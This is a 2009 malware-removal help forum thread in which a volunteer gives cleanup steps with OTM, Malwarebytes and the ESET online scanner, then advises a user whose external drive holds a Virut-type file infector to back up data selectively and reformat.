H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0002\4BCE6382.VBN 
H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0001\4BFDF086.VBN 
H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0000\4BFDED76.VBN 
H:\backup\Documents and Settings\me\My Documents\Azureus Downloads\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe 

:Commands
[EmptyTemp]
Reboot]
  • Return to OTM, right-click in the "Paste instructions for items to be moved" window (under the yellow bar) and choose Paste
  • Then click the red MoveIt! button.
  • Copy everything in the Results window (under the green bar) to the clipboard by highlighting ALL of it and pressing CTRL + C (or, after highlighting, right-click and choose Copy), and paste it into your next response.
  • If OTM asks to reboot your computer, allow it to do so. The report should appear in Notepad after the reboot.
  • Close OTM.

Malwarebytes Anti-Malware:

  • Launch the application, Check for Updates >> Perform full Scan
  • When the scan is complete, click OK, then Show Results to view the results.
  • Be sure that everything is checked, and click Remove Selected.
  • When completed, a log will open in Notepad. please copy and paste the log into your next reply.

Note: If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts, click OK to either and let MBAM proceed with the disinfection process, if asked to restart the computer, please do so immediately. Failure to reboot will prevent MBAM from removing all the malware.

ESET Online Scanner:

Note: You can use either Internet Explorer or Mozilla FireFox for this scan.

  • Please go here then click on: Image
    Note: If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.
    All of the below instructions are compatible with either Internet Explorer or Mozilla FireFox.
  • Select the option YES, I accept the Terms of Use then click on: Image
  • When prompted allow the Add-On/Active X to install.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Now click on: Image
  • The virus signature database... will begin to download. Be patient this make take some time depending on the speed of your Internet Connection.
  • When completed the Online Scan will begin automatically.
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • When completed select Uninstall application on close if you so wish, make sure you copy the logfile first!
  • Now click on: Image
  • Use notepad to open the logfile located at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
  • Copy and paste that log as a reply to this topic.

When completed the above, please post back the following in the order asked for:

  • How is you computer performing now, any other symptoms and or problems encountered?
  • OTM Log.
  • Malwarebytes Anti-Malware Log.
  • ESET Log.
  • A new HijackThis Log.
User avatar
Dakeyras
MRU Honors Graduate
MRU Honors Graduate
 
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby hn2009 » August 9th, 2009, 2:32 pm

Hi,

I was unable to perform the previous steps provided by you as my laptop just went down the hill from thr on and I had to format and restore it back to factory setting.

Now I have two desktops at home on which I connected my external Hard Disk Drive and scanned it using Bullguard software. I had a number of viruses which I cleaned by deleting all of them. However when I detached my Hard Drive and connected it back Bullguard again detected viruses and quarantined them. Now I do not know how to get rid of these viruses. The System Volume is affected by Win32.Virtob.Gen.12 & Gen.Trojan.Heur.GM.0000026180.

I am in deep troube trying to clean up all the viruses and my work is badly affected because of this (3 days of unproductivity). I sincerely request you to help me at the earliest.

Regards,
Harsh
hn2009
Active Member
 
Posts: 12
Joined: July 22nd, 2009, 4:59 am

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby Dakeyras » August 9th, 2009, 3:43 pm

Hi :)

I was unable to perform the previous steps provided by you as my laptop just went down the hill from thr on and I had to format and restore it back to factory setting.
If I understand correctly this was the machine we were working on, if so fair play and thank you for informing myself.

Now I have two desktops at home on which I connected my external Hard Disk Drive and scanned it using Bullguard software. I had a number of viruses which I cleaned by deleting all of them. However when I detached my Hard Drive and connected it back Bullguard again detected viruses and quarantined them. Now I do not know how to get rid of these viruses. The System Volume is affected by Win32.Virtob.Gen.12 & Gen.Trojan.Heur.GM.0000026180.
This is not good news at all I'm afraid one of the infections is a variation of a polymorphic, memory-resident file-infector.

I am in deep troube trying to clean up all the viruses and my work is badly affected because of this (3 days of unproductivity). I sincerely request you to help me at the earliest.
These are business related machines even though this forum and I myself have a policy about not providing assistance for such it is all a moot point.

Next

One or more of the identified infections is a severe Polymorphic File Infector

This allows hackers to remotely control your computer, steal critical system information and Download and Execute files.

I would counsel you to disconnect this PC from the Internet immediately. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable, and it would be wise to contact those same financial institutions to apprise them of your situation.

Unfortunately no attempt could be made to clean this machine, it could never be considered to be truly clean, secure, or trustworthy. We could not say definitively that unknown and unseen malware will have been removed, nor will your system be restored to its pre-infection state. We cannot remedy unknown changes the malware may likely have made in order to allow itself access, nor can we repair the damage it may possibly have caused to vital system files. Additionally, it is quite possible that changes made to the system by the malware may impact negatively on your computer during the removal process. In short, your system may never regain its former stability or its full functionality without a reformat. Therefore, your best and only course of action is a reformat and reinstallation of the Windows operating system, and that is the course we strongly recommend.

I also recommend you format the external Hard-Drive and if you use a Router, reset it and apply a new Admin' password.

Please read these for more information:

Virut and other Other File Infectors

How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?

When Should I Format, How Should I Reinstall

Next:

I suggest you to start backup all of your valuable data/documents/pictures/movies/songs/etc..
Do NOT backup any applications/installers and Do NOT backup any .exe/.scr/.htm/.html/.xml/.zip/.rar files...
This is because these files may be infected as well. If you back them up and replace them afterwards, it will infect your computer again.

Should you have any questions, please feel free to ask.
User avatar
Dakeyras
MRU Honors Graduate
MRU Honors Graduate
 
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby NonSuch » August 13th, 2009, 2:12 am

As the resolution of this issue requires a reformat, and there have been no questions posted regarding that process, this topic is now closed.

You can help support this site from this link:
Donations For Malware Removal
User avatar
NonSuch
Administrator
Administrator
 
Posts: 28747
Joined: February 23rd, 2005, 7:08 am
Location: California
Advertisement
Register to Remove

Previous

  • Similar Topics
    Replies
    Views
    Last post

Return to Infected? Virus, malware, adware, ransomware, oh my!



Who is online

Users browsing this forum: No registered users and 303 guests

Contact us:

Advertisements do not imply our endorsement of that product or service. Register to remove all ads. The forum is run by volunteers who donate their time and expertise. We make every attempt to ensure that the help and advice posted is accurate and will not cause harm to your computer. However, we do not guarantee that they are accurate and they are to be used at your own risk. All trademarks are the property of their respective owners.

Member site: UNITE Against Malware